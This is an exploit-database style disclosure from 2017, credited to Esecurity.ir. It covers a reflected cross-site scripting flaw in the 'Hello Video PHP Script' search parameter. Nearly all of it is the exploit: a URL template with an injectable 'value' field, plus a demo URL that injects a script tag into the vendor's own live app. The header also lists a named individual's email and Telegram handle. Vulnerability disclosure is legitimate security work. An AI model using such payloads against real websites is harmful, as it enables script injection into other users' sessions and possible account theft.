# Exploit Title: Hello Video PHP Script XSS Vulnerability
# Date: 2017-10-07
# Exploit Author: Esecurity.ir
# Exploit Author Web Site: http://esecurity.ir
# Vendor Homepage: http://hellovideoapp.com/
# Version: All Version
# Special thanks : Meisam Monsef - Email : meisamrce@gmail.com - TelgramID : @meisamrce
Exploit :
http://tareget.com/search?value=[xss code is here]
Demo :
http://app.hellovideoapp.com/search?value=<script>alert('esecurity.ir')</script>